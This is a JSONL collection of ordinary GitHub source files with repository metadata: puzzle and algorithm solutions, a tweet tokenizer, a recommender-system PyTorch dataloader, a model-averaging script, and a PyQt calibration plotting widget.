+{"seq_id":"20358782705","text":"from os import listdir, system\nfrom os.path import isfile, join\nimport sys\n\nRAW_PDF_DIR = 'rawPDFs'\nCHARACTER_BOX_DIR = 'CharacterBoxes'\n\nbatch, name, numPages = sys.argv[1:]\nnumPages = int(numPages)\n\n\nfor page in range(1,numPages+1):\n\t# print batch, name, page\n\tcmd = \"python FindCharactersOnPage.py {} {} {} > {}/{}-{}-page-{}-{}.csv\".format(batch, name, page, CHARACTER_BOX_DIR, batch, name, page, CHARACTER_BOX_DIR)\n\tsystem(cmd)\n","repo_name":"todd9527/cs229-project","sub_path":"allPagesFindCharactersOnPage.py","file_name":"allPagesFindCharactersOnPage.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27436581592","text":"import re\nimport os \n\n# Read in Data\nf = open(os.path.dirname(os.path.abspath(__file__)) + '/day05.txt', 'r')\ncontent = f.read()\nf.close()\n\n## Split into instructions and create stack\ncontent = [x for x in content.split('\\n\\n')]\n\n## Format 
Instructions \ninstructions = content[1]\n# instructions example\n# instructions = \"\"\"move 1 from 2 to 1\n# move 3 from 1 to 3\n# move 2 from 2 to 1\n# move 1 from 1 to 2\n# \"\"\"\ninstructions = [x for x in instructions.split('\\n')]\ninstructions = [[int(y) for y in re.findall(r'\\d+', x)] for x in instructions]\n\n## Format Stack\nstack=content[0]\nstack = [\n ['H','R','B','D','Z','F','L','S'],\n ['T','B','M','Z','R'],\n ['Z','L','C','H','N','S'],\n ['S','C','F','J'],\n ['P','G','H','W','R','Z','B'],\n ['V','J','Z','G','D','N','M','T'],\n ['G','L','N','W','F','S','P','Q'],\n ['M','Z','R'],\n ['M','C','L','G','V','R','T']\n]\n\n# stack example\n# stack = [\n# ['z','n'],\n# ['m','c','d'],\n# ['p']\n# ]\n\nfor x in range(len(instructions)):\n if len(instructions[x]) == 0: break\n \n move = instructions[x][0]\n origin = instructions[x][1]-1\n destination = instructions[x][2]-1\n\n # Move from origin to destination reversing order - delete end of list where origin is\n moving = stack[origin][-move:]\n\n # Reverse list if part 1 \n # moving.reverse() \n\n stack[destination] = stack[destination] + moving\n stack[origin] = stack[origin][:-move]\n\n\nprint(''.join([x[-1] for x in stack]))\n","repo_name":"shaunksk/advent-of-code","sub_path":"2022/day05.py","file_name":"day05.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27487129376","text":"import sqlite3\nfrom jNlp.jTokenize import jTokenize\n\nconn = sqlite3.connect('streaming_data.sqlite')\ncur = conn.cursor() \n\nresult = cur.execute(\"SELECT message FROM tweets WHERE date BETWEEN 'Fri Sep 08 00:00:00 +0000 2017' AND 'Fri Sep 08 00:05:00 +0000 2017'\")\nfhand = open('ja_stopword.txt', encoding =\"utf-8\")\nstop_words=[]\n\nfor messages in result:\n\tfor message in messages:\n\t\tt_message = jTokenize(message)\n\t\tprint('-'.join(t_message))\n\n\n#for words in fhand:\n#\twords = words.strip('\\n')\n#\tif words not in stop_words:\n#\t\tstop_words.append(words)\n\t\n\n#filtered_sentence = [w for w in msg_tokenized if not w in stop_words]\n#print(\"CLEANED:\")\n#print(filtered_sentence)\n","repo_name":"jesseulundo/Twitter_Anlytics","sub_path":"stop_words_tweet_part.py","file_name":"stop_words_tweet_part.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16533088827","text":"import sys\n\nsys.stdin = open('c:\\\\Users\\\\multicampus\\\\Desktop\\\\vscode\\\\algorithm\\\\SWEA_D4\\\\1210\\\\input.txt')\n\n\ndef find(boardi, b):\n a = 100\n while a>0:\n if boardi[a][b+1]:\n while boardi[a][b+1]:\n b += 1\n a -= 1\n elif boardi[a][b-1]:\n while boardi[a][b-1]:\n b -= 1\n a -= 1\n else:\n a -= 1\n return b-1\n\n\nfor tc in range(10):\n tc = int(input())\n board = [ [0 for _ in range(102) ] ]\n for _ in range(100):\n board.append([0]+list(map(int, input().split()))+[0])\n finish = board[-1].index(2)\n result = find(board, int(finish))\n print(f'#{tc} {result}')\n","repo_name":"yuueuni/algorithm","sub_path":"swea/SWEA_D4/1210/1210.py","file_name":"1210.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18191694586","text":"import csv\nimport time\nimport torch\nimport random\nimport numpy as np\n\nfrom tqdm import tqdm\nfrom torch.utils import data\nfrom datetime import datetime\nfrom torch.nn.utils.rnn import pad_sequence\nfrom 
dateutil.relativedelta import relativedelta\n\n\nrandom.seed(2022)\n\ndef toymd(time):\n return datetime.utcfromtimestamp(time)#.strftime('%Y-%m-%d')\n\ndef get_timebin_from_timestamp(times, timebins): # times: timestamps\n binfeature = np.zeros(len(timebins))\n for eachtime in times: \n binidxs = np.where(timebins <= toymd(eachtime))[0] # select an element\n \n if len(binidxs) != 0: \n target_bin_idx = binidxs[-1] \n binfeature[target_bin_idx] += 1 \n return binfeature\n\ndef get_timebin_from_timestamp4eachuser(times, timebins): # times: timestamps of consumed items \n time_bins = [] # frequency bins that will be used as features\n for eachtime in times: \n binfeature = np.zeros(len(timebins))\n\n binidxs = np.where(timebins <= toymd(eachtime))[0] # select an element\n \n if len(binidxs) != 0: \n target_bin_idx = binidxs[-1] \n binfeature[target_bin_idx] += 1 \n time_bins.append(binfeature)\n return time_bins\n\nclass SEQRS_Dataset(data.Dataset):\n \n def build_consumption_history(self, uirt):\n # Build a dictionary for user: items consumed by the user\n uidict = {}\n allitems = set()\n for u, i, _, _ in uirt.astype(int):\n if u not in uidict: uidict[u] = set()\n uidict[u].add(i)\n allitems.add(i)\n \n ui_cand_dict = {} \n for u in tqdm(uidict):\n allnegitems = list(allitems - uidict[u])\n truncated_negitems = allnegitems[:1000]\n ui_cand_dict[u] = np.array(truncated_negitems)\n# ui_cand_dict[u] = np.array(list(allitems - uidict[u]))\n \n # TODO: Its size increases proportionally \n \n return uidict, allitems, ui_cand_dict\n \n def __init__(self, path, trn_numneg, opt): \n dpath = '/'.join(path.split('/')[:-1])\n if dpath[-1] != '/': dpath += '/'\n dtype = path.split('/')[-1] # dtype {trn, vld, tst}\n \n self.opt = opt\n \n st = time.time() \n \n if dtype == 'trn': \n self.numneg = trn_numneg \n \n self.uirt = np.load(dpath+dtype)\n \n # userhist contains both items and times\n if dtype != 'tst': # trainig or validation\n userhist = np.load(dpath+'userhist', allow_pickle=True).item() \n itemhist = np.load(dpath+'itemhist', allow_pickle=True).item()\n neighborhist = np.load(dpath+'neighborhist', allow_pickle=True).item()\n\n itlist = [[iid, itemhist[iid]] for iid in itemhist]\n \n elif dtype == 'tst':\n userhist = np.load(dpath+'userhist_wvld', allow_pickle=True).item() \n itemhist = np.load(dpath+'itemhist_wvld', allow_pickle=True).item() \n neighborhist = np.load(dpath+'neighborhist_wvld', allow_pickle=True).item() \n \n itlist = [[iid, itemhist[iid]] for iid in itemhist]\n \n # recent item first\n for u in userhist: # + truncation wiht MAX # of users' hist\n itemseq, timeseq = userhist[u]\n reverse_idx = (-timeseq).argsort() \n userhist[u] = [itemseq[reverse_idx][:opt.maxhist], timeseq[reverse_idx][:opt.maxhist]] # NOTE: trauncation from the front is right because the descending sorting \n for i in neighborhist: # + truncation wiht MAX # of users' hist\n userseq, timeseq = neighborhist[i] \n reverse_idx = (-timeseq).argsort()\n neighborhist[i] = [userseq[reverse_idx][:opt.maxhist], timeseq[reverse_idx][:opt.maxhist]] \n for i in itemhist:\n timeseq = itemhist[i]\n reverse_idx = (-timeseq).argsort() \n itemhist[i] = timeseq[reverse_idx][:opt.maxhist] \n # itemhist[i] = timeseq[reverse_idx] # NOTE This version works well..\n\n # 3.1 Building bin basis\n trntimes = np.load(opt.dataset_path + '/trn')[:,-1].astype(int) # ascending sorted\n mintime = toymd(min(trntimes))\n \n timedelta = relativedelta(weeks=opt.binsize)\n\n if dtype == 'trn':\n trnfront_time = trntimes.max() - 60 * 60 * 24 * 
7 * opt.period \n trnfront_idx = np.where(trntimes < trnfront_time)[0][-1] \n self.label_period_start_time = trntimes[trnfront_idx]\n trnlabeltime = toymd(self.label_period_start_time)\n \n bins = np.array([mintime + timedelta*i for i in range(1000) # quick implementation\n if mintime + timedelta*i < trnlabeltime] + [trnlabeltime]) \n \n self.bins = bins[-int(opt.bin_ratio * len(bins)):] # Time bin truncation\n elif dtype == 'vld':\n trnmaxtime = toymd(max(trntimes))\n \n bins = np.array([mintime + timedelta*i for i in range(1000) # quick implementation\n if mintime + timedelta*i < trnmaxtime] + [trnmaxtime]) \n \n self.bins = bins[-int(opt.bin_ratio * len(bins)):] \n elif dtype == 'tst':\n vld = [l for l in csv.reader(\n open('/'.join(opt.dataset_path.split('/')[:-1])+'/split/vld.csv'))]\n vldtimes = np.array(vld)[:,-1].astype(int) \n\n\n vldmaxtime = toymd(max(vldtimes)) \n\n bins = np.array([mintime + timedelta*i for i in range(1000) # quick implementation\n if mintime + timedelta*i < vldmaxtime] + [vldmaxtime]) \n self.bins = bins[-int(opt.bin_ratio * len(bins)):]\n\n\n # 3.2 Build time bins for each user's all consumed items \n self.freqbins = {}\n for u in userhist: \n consumed_iids = userhist[u][1]\n fb = get_timebin_from_timestamp4eachuser(consumed_iids, self.bins) \n self.freqbins[u] = np.array(fb) \n\n self.neighbor_user_freqbins = {}\n for i in neighborhist: \n self.neighbor_user_freqbins[i] = {} \n consumed_users, consumed_times = neighborhist[i]\n fb = get_timebin_from_timestamp4eachuser(consumed_times, self.bins) \n \n self.neighbor_user_freqbins[i]['user'] = consumed_users\n self.neighbor_user_freqbins[i]['time'] = consumed_times\n self.neighbor_user_freqbins[i]['freqbin'] = np.array(fb)\n \n\n # Data building for training/validation/test \n if dtype == 'trn': \n trndata = [[u, userhist[u]] for u in userhist] \n \n \n # #.Time bin processing for items\n trntimes = np.concatenate([i[1] for i in itlist]).astype(int)\n \n mintime = toymd(min(trntimes))\n trnmaxtime = toymd(max(trntimes))\n\n trnfront_time = trntimes.max() - 60 * 60 * 24 * 7 * opt.period \n trnfront_idx = np.where(trntimes < trnfront_time)[0][-1] \n label_period_st = trntimes[trnfront_idx] # st: start time\n \n\n self.item_fldict = {} # dictionary of (Item ID - feature, label)\n # item_feature, item_label = [], [] \n for iid in itemhist:\n item_time = itemhist[iid]\n\n feature = item_time[item_time= label_period_st)))\n\n binfeature = get_timebin_from_timestamp(feature, self.bins)\n\n self.item_fldict[iid] = [binfeature, label]\n\n\n self.first, self.second = zip(*trndata) # user and their sequential items with times\n self.third = np.zeros(len(self.first)) # Negative items. 'train_collate' does the job. 
\n \n # # Global maximum sacrifices some computation\n maxnum_neighbor = max([len(self.neighbor_user_freqbins[i]['user']) for i in self.neighbor_user_freqbins])\n maxnum_neighbor_time = max([len(self.neighbor_user_freqbins[i]['time']) for i in self.neighbor_user_freqbins])\n maxnum_neighbor_freqbin = max([len(self.neighbor_user_freqbins[i]['freqbin']) for i in self.neighbor_user_freqbins])\n\n self.fourth = []\n for i in range(len(self.first)):\n u = self.first[i]\n all_neighbors = []\n all_neighbors_time = []\n all_neighbors_freqbin = []\n\n for j in self.second[i][0]:\n neighbors = torch.LongTensor(self.neighbor_user_freqbins[j]['user'])\n neighbors_time = torch.LongTensor(self.neighbor_user_freqbins[j]['time'])\n neighbors_freqbin = torch.LongTensor(self.neighbor_user_freqbins[j]['freqbin'])\n\n all_neighbors.append(neighbors)\n all_neighbors_time.append(neighbors_time)\n all_neighbors_freqbin.append(neighbors_freqbin)\n \n\n # First, make sure everything is padded to the maximum length\n all_neighbors[0] = torch.cat([all_neighbors[0], torch.zeros(maxnum_neighbor-len(all_neighbors[0]))])\n all_neighbors_time[0] = torch.cat([all_neighbors_time[0], torch.zeros(maxnum_neighbor_time-len(all_neighbors_time[0]))])\n all_neighbors_freqbin[0] = torch.cat([all_neighbors_freqbin[0], torch.zeros(maxnum_neighbor_freqbin-all_neighbors_freqbin[0].shape[0],all_neighbors_freqbin[0].shape[1])])\n\n all_neighbors = pad_sequence(all_neighbors, batch_first=True)\n all_neighbors_time = pad_sequence(all_neighbors_time, batch_first=True)\n all_neighbors_freqbin = pad_sequence(all_neighbors_freqbin, batch_first=True)\n\n self.fourth.append({'user':all_neighbors, 'time':all_neighbors_time, 'freqbin':all_neighbors_freqbin})\n \n self.numuser = len(set(self.uirt[:,0]))\n self.numitem = len(set(self.uirt[:,1]))\n \n\n elif dtype in ['vld', 'tst']: # Evaluation\n # Find user histories \n \n # Build validation data for ranking evaluation\n newuir = []\n for row in self.uirt: \n user = row[0]\n uhist = userhist[user] \n items = row[1:] # 1 positive item + 100 negative items\n newuir.append([[user, uhist], items])\n \n self.first, self.second = zip(*newuir)\n self.third = np.zeros(len(self.first)) # this is dummy data\n self.fourth = np.zeros(len(self.first)) # this is dummy data\n\n # # Global maximum sacrifices some computation\n maxnum_neighbor = max([len(self.neighbor_user_freqbins[i]['user']) for i in self.neighbor_user_freqbins])\n maxnum_neighbor_time = max([len(self.neighbor_user_freqbins[i]['time']) for i in self.neighbor_user_freqbins])\n maxnum_neighbor_freqbin = max([len(self.neighbor_user_freqbins[i]['freqbin']) for i in self.neighbor_user_freqbins])\n\n users = [i[0] for i in self.first]\n items = [row[1:] for row in self.uirt]\n self.fourth = []\n for i in range(len(users)):\n u = users[i]\n all_neighbors = []\n all_neighbors_time = []\n all_neighbors_freqbin = []\n\n for j in items[i]:\n neighbors = torch.LongTensor(self.neighbor_user_freqbins[j]['user'])\n neighbors_time = torch.LongTensor(self.neighbor_user_freqbins[j]['time'])\n neighbors_freqbin = torch.LongTensor(self.neighbor_user_freqbins[j]['freqbin'])\n\n all_neighbors.append(neighbors)\n all_neighbors_time.append(neighbors_time)\n all_neighbors_freqbin.append(neighbors_freqbin)\n\n # Padding here \n\n # First, make sure everything is padded to the maximum length\n all_neighbors[0] = torch.cat([all_neighbors[0], torch.zeros(maxnum_neighbor-len(all_neighbors[0]))])\n all_neighbors_time[0] = torch.cat([all_neighbors_time[0], torch.zeros(maxnum_neighbor_time-len(all_neighbors_time[0]))])
\n all_neighbors_freqbin[0] = torch.cat([all_neighbors_freqbin[0], torch.zeros(maxnum_neighbor_freqbin-all_neighbors_freqbin[0].shape[0],all_neighbors_freqbin[0].shape[1])])\n\n all_neighbors = pad_sequence(all_neighbors, batch_first=True)\n all_neighbors_time = pad_sequence(all_neighbors_time, batch_first=True)\n all_neighbors_freqbin = pad_sequence(all_neighbors_freqbin, batch_first=True)\n\n self.fourth.append({'user':all_neighbors, 'time':all_neighbors_time, 'freqbin':all_neighbors_freqbin})\n\n\n self.item_fdict = {} # dictionary of (Item ID - feature) \n for iid in itemhist: \n item_time = itemhist[iid] \n feature = item_time\n \n # convert timestamps to time bins\n binfeature = get_timebin_from_timestamp(feature, self.bins)\n \n self.item_fdict[iid] = binfeature\n\n \n \n print('{} data : {:.2f}s'.format(dtype.upper(), time.time()-st))\n\n def __getitem__(self, index):\n # Training: [user, positive, negative]\n # Testing: [user, candidate item, label] \n return self.first[index], self.second[index], self.third[index], self.fourth[index]\n \n def __len__(self):\n \"\"\"Returns the total number of user-item pairs.\"\"\"\n return len(self.first)\n \n \n def train_collate(self, batch):\n # Input: [user, positive item, dummy]\n # Output: [user, positive item, negative item]\n batch = [i for i in filter(lambda x:x is not None, batch)]\n \n uids, items_times, _, neighbor_info = zip(*batch) # users and their history \n iids, raw_times = zip(*items_times) \n\n flatten_user = np.concatenate([[uids[i]]*len(iids[i]) for i in range(len(uids))])\n flatten_item = np.concatenate(iids) \n flatten_time = np.concatenate(raw_times)\n\n flatten_history = [[iids]*len(iids[i]) for i in range(len(iids))]\n\n # User's consumption history (items) to compute virtual features\n num_items = torch.LongTensor([len(i) for i in iids]) \n pad_items = pad_sequence([torch.LongTensor(it) for it in iids], batch_first=True)\n pad_items = torch.repeat_interleave(pad_items, num_items, dim=0)\n\n # Convert the data into tensors\n users = torch.LongTensor(flatten_user)\n items = torch.LongTensor(flatten_item)\n times = torch.LongTensor(flatten_time)\n\n \n pack_times = pad_sequence([torch.FloatTensor(ti) for ti in raw_times], batch_first=True)\n\n # NOTE: randomly selected negative samples show performance almost identical to using items not consumed by the user, while random sampling drastically reduces the computation time\n all_neg_items = np.random.randint(self.opt.numitem, size=(self.opt.numneg, len(users)))\n all_neg_items = torch.LongTensor(all_neg_items)\n\n # Flatten item (extrinsic data) \n flatten_items = items # Not matrix format but redundant data\n\n # Find feature & label for extrinsic prediction\n item_freqbins, item_labels = [], []\n for iid in flatten_items.tolist():\n ft, lb = self.item_fldict[iid]\n item_freqbins.append(ft)\n item_labels.append(lb)\n \n item_freqbins = pad_sequence([torch.LongTensor(itf) for itf in item_freqbins], batch_first=True)\n item_labels = torch.LongTensor(item_labels) \n \n # Intrinsic frequency bins\n freqbins = [self.freqbins[u] for u in uids] \n pad_freqbins = pad_sequence([torch.FloatTensor(fb) for fb in freqbins], batch_first=True) \n pad_freqbins = torch.repeat_interleave(pad_freqbins, num_items, dim=0)\n\n pad_pack_times = torch.repeat_interleave(pack_times, num_items, dim=0)\n\n # data for neighborhood (Extrinsic prediction)\n\n pad_neighbors = torch.cat([neighbor_info[i]['user'] for i in range(len(neighbor_info))], dim=0).long()
\n pad_neighbors_time = torch.cat([neighbor_info[i]['time'] for i in range(len(neighbor_info))], dim=0)\n pad_neighbors_freqbin = torch.cat([neighbor_info[i]['freqbin'] for i in range(len(neighbor_info))], dim=0)\n\n return users, items, times, pad_freqbins, pad_items, pad_pack_times, all_neg_items, item_freqbins, item_labels, pad_neighbors, pad_neighbors_time, pad_neighbors_freqbin\n\n\n def test_collate(self, batch):\n batch = [i for i in filter(lambda x:x is not None, batch)]\n\n uinfo, cand_items, labels, neighbor_info = zip(*batch) \n \n uid, items_times = zip(*uinfo)\n items, times = zip(*items_times)\n\n users = torch.LongTensor(uid)\n labels = torch.LongTensor(labels)\n cand_items = torch.LongTensor(np.array(cand_items)) \n items = pad_sequence([torch.LongTensor(it) for it in items], batch_first=True)\n times = pad_sequence([torch.LongTensor(ti.astype(int)) for ti in times], batch_first=True)\n \n flat_canditems = cand_items.flatten().tolist()\n\n item_freqbins = torch.FloatTensor(np.array([self.item_fdict[i] for i in flat_canditems])) \n\n # Frequency bins \n freqbins = [self.freqbins[u] for u in uid]\n maxfb = max([fb.shape[0] for fb in freqbins]) \n \n # Padding frequency bins\n numbins = len(self.bins)\n pad_freqbins = []\n for fb in freqbins:\n zeropad = np.zeros((maxfb - fb.shape[0], numbins))\n fb = np.concatenate([fb, zeropad])\n pad_freqbins.append(fb)\n pad_freqbins = np.array(pad_freqbins)\n pad_freqbins = torch.FloatTensor(pad_freqbins)\n \n all_user_info = [users, items, times, pad_freqbins] \n \n pad_neighbors = torch.cat([neighbor_info[i]['user'] for i in range(len(neighbor_info))], dim=0).long()\n pad_neighbors_time = torch.cat([neighbor_info[i]['time'] for i in range(len(neighbor_info))], dim=0)\n pad_neighbors_freqbin = torch.cat([neighbor_info[i]['freqbin'] for i in range(len(neighbor_info))], dim=0)\n\n return all_user_info, cand_items, labels, item_freqbins, pad_neighbors, pad_neighbors_time, pad_neighbors_freqbin\n\n \n\nclass DataLoader: \n def __init__(self, opt):\n self.opt = opt\n self.dpath = opt.dataset_path + '/'\n self.bs = opt.batch_size\n self.trn_numneg = opt.numneg\n \n self.trn_loader, self.vld_loader, self.tst_loader = self.get_loaders_for_seqrs() \n \n print((\"train/val/test divided by batch size: {:d}/{:d}/{:d}\".format(\n len(self.trn_loader), len(self.vld_loader),len(self.tst_loader))))\n print(\"=\" * 80)\n \n def get_loaders_for_seqrs(self):\n print(\"\\n📋 Loading data...\\n\")\n trn_loader = self.get_each_loader(self.dpath+'trn', self.bs, self.trn_numneg, shuffle=True)\n vld_loader = self.get_each_loader(self.dpath+'vld', int(self.bs/2), self.trn_numneg, shuffle=False)\n tst_loader = self.get_each_loader(self.dpath+'tst', int(self.bs/2), self.trn_numneg, shuffle=False) \n \n return trn_loader, vld_loader, tst_loader\n \n def get_each_loader(self, data_path, batch_size, trn_negnum, shuffle=True, num_workers=0):\n \"\"\"Builds and returns Dataloader.\"\"\"\n\n dataset = SEQRS_Dataset(data_path, trn_negnum, self.opt)\n\n if data_path.endswith('trn'):\n collate = dataset.train_collate\n else:\n collate = dataset.test_collate\n\n data_loader = data.DataLoader(dataset=dataset,\n batch_size=batch_size,\n shuffle=shuffle,\n num_workers=num_workers,\n collate_fn=collate)\n\n return data_loader\n \n def get_loaders(self):\n return self.trn_loader, self.vld_loader, self.tst_loader\n \n def get_embedding(self):\n return self.input_embedding\n \n\n 
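\n# Usage sketch (illustrative; assumes `opt` is an argparse-style namespace with the\n# fields referenced above, e.g. dataset_path, batch_size, numneg, maxhist, binsize,\n# bin_ratio, period, numitem):\n#\n# loader = DataLoader(opt)\n# trn_loader, vld_loader, tst_loader = loader.get_loaders()\n# batch = next(iter(trn_loader)) # fields unpack as returned by train_collate\n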
","repo_name":"anon-subm/PERIS","sub_path":"dataloaders/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":20657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72228909034","text":"import argparse\nimport torch\n\nparser = argparse.ArgumentParser(\"Average model parameters\")\nparser.add_argument(\"--model_list\", required=True, help=\"list of model to be averaged\")\nparser.add_argument(\"--output_file\", required=True, help=\"output model file\")\nargs = parser.parse_args()\n\nmodel_list = args.model_list\noutput_file = args.output_file\n\nwith open(model_list, 'r') as f:\n model_files = [line.strip() for line in f.readlines()]\ncount = len(model_files)\n\nstate_dict = {}\nfor i, model_file in enumerate(model_files):\n model_dict = torch.load(model_file, map_location='cpu')\n for key, param in model_dict.items():\n if i == 0:\n state_dict[key] = param\n else:\n assert key in state_dict\n state_dict[key] += param\nfor k in state_dict.keys():\n if state_dict[k] is not None:\n state_dict[k] = torch.true_divide(state_dict[k], count)\ntorch.save(state_dict, output_file)\n","repo_name":"tencent-ailab/3m-asr","sub_path":"tools/average_model.py","file_name":"average_model.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":110,"dataset":"github-code","pt":"72"} +{"seq_id":"20663244975","text":"def run() -> int:\n sum_of_the_squares = sum(i ** 2 for i in range(1, 101))\n square_of_the_sum = sum(j for j in range(1, 101)) ** 2\n return square_of_the_sum - sum_of_the_squares\n\n\nif __name__ == \"__main__\":\n from timeit import default_timer as timer\n\n start = timer()\n print(\"Solution:\", run())\n print(\"Duration:\", timer() - start)\n","repo_name":"gregorgabrovsek/ProjectEuler","sub_path":"Problem006.py","file_name":"Problem006.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5154735929","text":"from qtstrap import *\nfrom .constants import *\nimport pyqtgraph as pg\nimport numpy as np\n\n\nclass DataSelector(QWidget):\n selectionChanged = Signal()\n\n def __init__(self, name='', parent=None):\n super().__init__(parent=parent)\n self.name = name\n\n changed = self.selectionChanged\n \n self.on = PersistentCheckBox(f'{name}_on', changed=changed)\n self.points = PersistentCheckBox(f'{name}_points', changed=changed)\n self.line = PersistentCheckBox(f'{name}_line', changed=changed)\n self.freqs = PersistentListWidget(f'{name}_freqs', items=['none']+freqs, default=['none'], selectionMode=QAbstractItemView.ExtendedSelection, changed=changed)\n field_names = [data_field_names[f] for f in data_fields]\n self.x = PersistentComboBox(f'{name}_x', items=field_names, changed=changed)\n self.y = PersistentComboBox(f'{name}_y', items=field_names, changed=changed)\n\n with CVBoxLayout(self) as layout:\n with layout.hbox():\n layout.add(QLabel(name))\n layout.add(QLabel(), 1)\n layout.add(QLabel('Pts:'))\n layout.add(self.points)\n layout.add(QLabel('Line:'))\n layout.add(self.line)\n layout.add(QLabel('On:'))\n layout.add(self.on)\n\n with layout.hbox():\n layout.add(QLabel('X:'))\n layout.add(self.x, 1)\n\n with layout.hbox():\n layout.add(QLabel('Y:'))\n layout.add(self.y, 1)\n\n def get_params(self):\n if self.on.checkState() and self.x.currentText() != self.y.currentText():\n return {\n 'x': data_field_names.inverse[self.x.currentText()][0], \n 'y': 
data_field_names.inverse[self.y.currentText()][0], \n 'on': self.on.checkState(), \n 'points': self.points.checkState(), \n 'line': self.line.checkState(), \n 'freqs': self.freqs.selected_items(),\n }\n return\n\n\nclass GraphTab(QWidget):\n def __init__(self, parent=None):\n super().__init__(parent=parent)\n \n self.plot_layout = pg.GraphicsLayoutWidget()\n self.custom_plots = [DataSelector(f'Custom Plot {i}', self) for i in range(1, 5)]\n\n def normalize(x):\n x = np.asarray(x)\n return (x - x.min()) / (np.ptp(x))\n\n self.freq_colors = dict(zip(freqs, normalize([float(f) for f in freqs])))\n\n self.freqs = PersistentListWidget(\n 'graph_freqs', items=freqs, selectionMode=QAbstractItemView.ExtendedSelection, changed=self.draw_plots)\n self.freq_tabs = PersistentTabWidget('graph_tabs')\n self.freq_tabs.addTab(self.freqs, 'all')\n for plot in self.custom_plots:\n self.freq_tabs.addTab(plot.freqs, plot.name[11:])\n self.freq_tabs.restore_state()\n\n self.fwd_v = PersistentCheckBox('graph_fwd_v', changed=self.draw_plots)\n self.fwd_w = PersistentCheckBox('graph_fwd_w', changed=self.draw_plots)\n\n with CHBoxLayout(self) as layout:\n with layout.vbox():\n layout.add(QLabel('Reference Plots:'))\n with layout.hbox():\n layout.add(QLabel('Forward Volts:'))\n layout.add(self.fwd_v)\n with layout.hbox():\n layout.add(QLabel('Forward Watts:'))\n layout.add(self.fwd_w)\n layout.add(HLine())\n layout.add(QLabel('Custom Plot Freqs:'))\n layout.add(self.freq_tabs, 1)\n layout.add(self.custom_plots)\n layout.add(self.plot_layout, 1)\n\n self.data = {}\n\n for plot in self.custom_plots:\n plot.selectionChanged.connect(self.draw_plots)\n\n def get_color_map(self, freqs):\n x = np.asarray([float(f) for f in freqs])\n lower = x.min()\n upper = x.max()\n normals = (x - lower) / (upper - lower)\n\n return dict(zip(freqs, normals))\n\n def poly_to_points(self, x1, poly):\n x2 = range(int(max(x1)))\n y2 = [poly(p) for p in x2]\n return x2, y2\n\n def add_forward_volts_plot(self):\n title = 'Forward Volts'\n labels = {'bottom':'Meter: Forward Watts', 'left':'Target: Forward Volts'}\n plot = self.plot_layout.addPlot(title=title, labels=labels)\n self.plot_added()\n plot.showGrid(x=True, y=True)\n plot.showButtons()\n plot.addLegend()\n\n colors = self.get_color_map(freqs)\n for freq in freqs:\n points = [p for p in self.data if p['freq'] == freq]\n x = [p['m_fwd'] for p in points]\n y = [p['t_fwd_volts'] for p in points]\n\n poly = np.poly1d(np.polyfit(x, y, 2))\n x2, y2 = self.poly_to_points(x, poly)\n\n plot.plot(x2, y2, pen=pg.hsvColor(colors[freq]), name=freq)\n plot.plot(x, y, pen=None, symbol='o', symbolSize=3, symbolPen=pg.hsvColor(colors[freq]))\n\n def add_forward_watts_plot(self):\n title = 'Forward Watts with Reference Line'\n labels = {'bottom':'Meter: Forward Watts', 'left':'Target: Forward Watts'}\n plot = self.plot_layout.addPlot(title=title, labels=labels)\n self.plot_added()\n plot.showGrid(x=True, y=True)\n plot.showButtons()\n plot.addLegend()\n\n reference_points = list(range(0, 210, 10))\n plot.plot(reference_points, reference_points, pen='w')\n \n colors = self.get_color_map(freqs)\n for freq in freqs:\n points = [p for p in self.data if p['freq'] == freq]\n x = [p['m_fwd'] for p in points]\n y = [p['t_fwd_watts'] for p in points]\n\n poly = np.poly1d(np.polyfit(x, y, 2))\n x2, y2 = self.poly_to_points(x, poly)\n\n plot.plot(x2, y2, pen=pg.hsvColor(colors[freq]), name=freq)\n plot.plot(x, y, pen=None, symbol='o', symbolSize=3, symbolPen=pg.hsvColor(colors[freq]))\n\n def 
add_custom_plot(self, params):\n title = 'Custom Plot'\n labels = {'bottom':data_field_names[params['x']], 'left':data_field_names[params['y']]}\n plot = self.plot_layout.addPlot(title=title, labels=labels)\n plot.showGrid(x=True, y=True)\n plot.showButtons()\n plot.addLegend()\n\n self.plot_added()\n\n plot_freqs = params['freqs']\n if 'none' in params['freqs']:\n plot_freqs = freqs\n colors = self.get_color_map(plot_freqs)\n\n for freq in plot_freqs:\n points = [p for p in self.data if p['freq'] == freq]\n x = [p[params['x']] for p in points]\n y = [p[params['y']] for p in points]\n\n name = freq\n if params['line']:\n poly = np.poly1d(np.polyfit(x, y, 2))\n x2, y2 = self.poly_to_points(x, poly)\n\n plot.plot(x2, y2, pen=pg.hsvColor(colors[freq]), name=name)\n name = None\n if params['points']:\n plot.plot(x, y, pen=None, symbol='o', symbolSize=3, symbolPen=pg.hsvColor(colors[freq]), name=name)\n name = None\n\n def reset_plot(self):\n self.plot_layout.clear()\n self.number_of_plots = 0\n\n def plot_added(self):\n self.number_of_plots += 1\n if self.number_of_plots % 2 == 0:\n self.plot_layout.nextRow()\n\n def draw_plots(self):\n freqs = self.freqs.selected_items()\n plot_params = [plot.get_params() for plot in self.custom_plots]\n self.reset_plot()\n \n if self.fwd_v.isChecked():\n self.add_forward_volts_plot()\n if self.fwd_w.isChecked():\n self.add_forward_watts_plot()\n\n for params in plot_params:\n if params is None:\n continue\n\n self.add_custom_plot(params)\n\n def set_data(self, data):\n self.data = data\n self.draw_plots()","repo_name":"DaelonSuzuka/DeviceManager","sub_path":"src/plugins/apps/calibration/graph_tab.py","file_name":"graph_tab.py","file_ext":"py","file_size_in_byte":7946,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} 